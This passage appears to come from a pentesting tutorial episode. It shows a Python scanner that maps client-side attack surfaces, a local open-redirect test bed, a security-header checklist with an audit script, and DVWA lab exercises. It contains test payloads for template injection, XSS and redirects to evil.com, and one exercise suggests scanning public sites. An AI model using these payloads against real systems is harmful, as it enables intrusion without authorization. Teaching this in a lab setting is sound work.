            print(f"    [!!] Auth tokens in localStorage: {auth_keys}")

    # 4. WebSocket endpoints
    ws_urls = re.findall(r'wss?://[^\s\'"]+', body)
    if ws_urls:
        print(f"[!] WebSocket endpoints found:")
        for ws in set(ws_urls):
            print(f"    {ws}")

    # 5. postMessage listeners
    pm_listeners = re.findall(r'addEventListener\s*\(\s*[\'"]message[\'"]', body)
    if pm_listeners:
        print(f"[!] postMessage listeners: {len(pm_listeners)} found")
        # Check for origin validation
        if 'event.origin' not in body and 'e.origin' not in body:
            print(f"    [!!] No origin validation detected in response body")

    # 6. Template injection indicators
    frameworks = []
    if 'ng-app' in body or 'ng-controller' in body:
        frameworks.append('Angular (ng-*)')
    if '__vue__' in body or 'Vue.component' in body or 'v-bind' in body:
        frameworks.append('Vue.js')
    if 'data-reactroot' in body or '_reactRoot' in body or 'React.createElement' in body:
        frameworks.append('React')
    if frameworks:
        print(f"[*] JS frameworks detected: {', '.join(frameworks)}")
        print(f"    Test for CSTI with: {{{{constructor.constructor('alert(1)')()}}}}")

    # 7. DOM XSS sink indicators in inline scripts
    inline_scripts = re.findall(r'<script[^>]*>(.*?)</script>', body, re.DOTALL)
    dangerous_sinks = 0
    for script in inline_scripts:
        for sink in ['innerHTML', 'outerHTML', 'document.write', 'eval(']:
            if sink in script:
                dangerous_sinks += 1
    if dangerous_sinks:
        print(f"[!] DOM XSS sinks in inline scripts: {dangerous_sinks}")

    print(f"\n{'='*60}")
    print(f"Scan complete.")

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    if not target:
        print("Usage: python3 client_side_scanner.py <url>")
        sys.exit(1)
    scan_target(target)

This scanner checks seven attack surfaces in one pass: clickjacking protections, open redirect parameters, localStorage token storage, WebSocket endpoints, postMessage listeners, framework detection (for template injection), and DOM XSS sinks in inline scripts. It's not a vulnerability scanner -- it's an attack surface mapper. It tells you WHERE to look, not whether the vulnerability exists. The human analysis that follows (actually exploiting the findings) is still necessary.
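If you want to sanity-check the scanner's open-redirect probe without touching a real target, you can spin up a deliberately vulnerable endpoint locally. This is a standard-library-only sketch — the `NaiveRedirect` handler and `is_open_redirect` helper are illustrative, not part of the scanner above:

```python
#!/usr/bin/env python3
"""Tiny local test bed for the open-redirect check."""
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

class NaiveRedirect(BaseHTTPRequestHandler):
    """Reflects ?next=<url> into a 302 Location header -- the classic bug."""
    def do_GET(self):
        query = urllib.parse.urlparse(self.path).query
        dest = urllib.parse.parse_qs(query).get('next', ['/'])[0]
        self.send_response(302)
        self.send_header('Location', dest)  # no destination validation
        self.end_headers()

    def log_message(self, *args):
        pass  # keep the test output quiet

class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 302 responses as HTTPError instead of following them."""
    def http_error_302(self, req, fp, code, msg, headers):
        raise urllib.error.HTTPError(req.full_url, code, msg, headers, fp)

def is_open_redirect(base_url, param='next'):
    """True if the endpoint reflects an attacker-controlled URL into Location."""
    opener = urllib.request.build_opener(NoRedirect)
    try:
        resp = opener.open(f"{base_url}?{param}=https://evil.com", timeout=5)
        location = resp.headers.get('Location', '')
    except urllib.error.HTTPError as e:  # our handler raises on 302
        location = e.headers.get('Location', '')
    return 'evil.com' in location

if __name__ == "__main__":
    server = HTTPServer(('127.0.0.1', 0), NaiveRedirect)  # port 0 = any free port
    threading.Thread(target=server.serve_forever, daemon=True).start()
    url = f"http://127.0.0.1:{server.server_address[1]}/login"
    print(f"{url} open redirect: {is_open_redirect(url)}")
    server.shutdown()
```

The same trick works in reverse: point the scanner at this server with destination validation added to `do_GET`, and confirm it no longer reports a finding.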

The AI Slop Connection

Continuing our thread from episode 6. Client-side attacks reveal a particular weakness in AI-generated code because AI models don't think adversarially about browser security boundaries.

AI-generated React/Vue/Angular components routinely:

  • Use dangerouslySetInnerHTML (React) or v-html (Vue) to render user-supplied content, creating DOM XSS sinks that bypass the framework's built-in escaping
  • Store JWTs in localStorage because the tutorial they were trained on did it that way (JWT.io's own documentation used to show localStorage examples before community pushback)
  • Implement postMessage handlers without origin checking because "it works" between their own windows during development
  • Skip X-Frame-Options headers because the AI generates application code, not deployment configuration
  • Build redirect endpoints that take a URL parameter and redirect to it (because that's the functional requirement) without validating the destination is on the same domain

Each of these is a client-side attack surface that exists because the AI optimizes for "does the feature work?" and never considers "can a malicious page abuse this feature?" The browser's security model is complex, and AI models treat it as invisible infrastructure rather than an active battleground ;-)

This is why you need to understand the browser, not just the server.

Prevention: Client-Side Security Headers

A significant portion of client-side attacks is preventable through proper HTTP security headers. Here's the checklist:

# The essential security headers
X-Frame-Options: DENY
Content-Security-Policy: frame-ancestors 'none'; default-src 'self'; script-src 'self'
X-Content-Type-Options: nosniff
Referrer-Policy: strict-origin-when-cross-origin
Permissions-Policy: camera=(), microphone=(), geolocation=()

X-Frame-Options: DENY blocks clickjacking. A Content-Security-Policy with frame-ancestors 'none' does the same, and its script-src directive additionally restricts where scripts can load from (blocking most XSS and template injection payloads). X-Content-Type-Options: nosniff stops the browser from MIME-sniffing responses, so an SVG served as text/plain won't be reinterpreted and execute its embedded scripts. Referrer-Policy controls what URL information leaks to third-party sites. Permissions-Policy (formerly Feature-Policy) restricts access to browser features like the camera, microphone, and geolocation.

These headers are deployment configuration, not application code. They're set in nginx, Apache, Cloudflare, or the application framework's response middleware. They take five minutes to configure. And they block entire categories of client-side attacks with zero impact on functionality. The fact that most web applications still don't set them all is... well, it's job security for pentesters ;-)
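To make that checklist repeatable, you can audit any response against it. A minimal sketch — the header names come from the checklist above, while the `missing_headers` helper and its value-check rule are my own:

```python
#!/usr/bin/env python3
"""Audit a URL's response headers against the client-side security checklist."""
import urllib.request

# Checklist headers; a non-None value must appear in the header (case-insensitive)
CHECKLIST = {
    'X-Frame-Options': None,
    'Content-Security-Policy': None,
    'X-Content-Type-Options': 'nosniff',
    'Referrer-Policy': None,
    'Permissions-Policy': None,
}

def missing_headers(headers):
    """Return checklist headers that are absent or carry an unexpected value."""
    lowered = {k.lower(): v for k, v in headers.items()}
    problems = []
    for name, expected in CHECKLIST.items():
        value = lowered.get(name.lower())
        if value is None or (expected and expected not in value.lower()):
            problems.append(name)
    return problems

def audit(url):
    """Fetch a URL and report which checklist headers are missing."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        return missing_headers(dict(resp.headers))

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for header in audit(sys.argv[1]):
            print(f"[!] Missing or misconfigured: {header}")
```

Run it against a staging instance before and after touching the web-server config and the diff is your verification.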

Exercises

Exercise 1: Build a clickjacking proof-of-concept against DVWA's CSRF page (like the example in this episode). Host clickjack.html on your Kali machine using python3 -m http.server 8888. Open it in the browser that's already authenticated to DVWA. Verify that clicking your "prize button" actually submits the CSRF form in the invisible iframe and changes the DVWA password. Then add X-Frame-Options: DENY to DVWA's Apache config (Header always set X-Frame-Options "DENY" in the VirtualHost block, then sudo systemctl restart apache2) and verify the clickjacking no longer works. Document both the working attack and the blocked attempt.

Exercise 2: Write a Python script called client_side_scanner.py that takes a URL and checks for: (a) missing X-Frame-Options header (clickjacking risk), (b) open redirect parameters (test the common parameter list from this episode against the target), (c) tokens stored in the response body with patterns suggesting localStorage usage (search for localStorage.setItem with auth-related key names), (d) WebSocket endpoints (search for ws:// or wss:// URLs in JavaScript). Test it against DVWA and two public websites of your choice. Document the findings for each target.

Exercise 3: Create two HTML pages that demonstrate the postMessage vulnerability. Page 1 ("vulnerable.html") listens for messages without checking event.origin and displays received messages using innerHTML. Page 2 ("attacker.html") loads Page 1 in an iframe and sends a crafted message containing an XSS payload (<img src=x onerror=alert('XSS via postMessage')>). Verify the XSS fires. Then create Page 3 ("secure.html") -- identical to Page 1 but with proper origin validation. Load it in the same attacker page and verify the XSS is blocked. Document the difference in behavior.


The browser is a battlefield. Every feature is a potential weapon.

@scipio


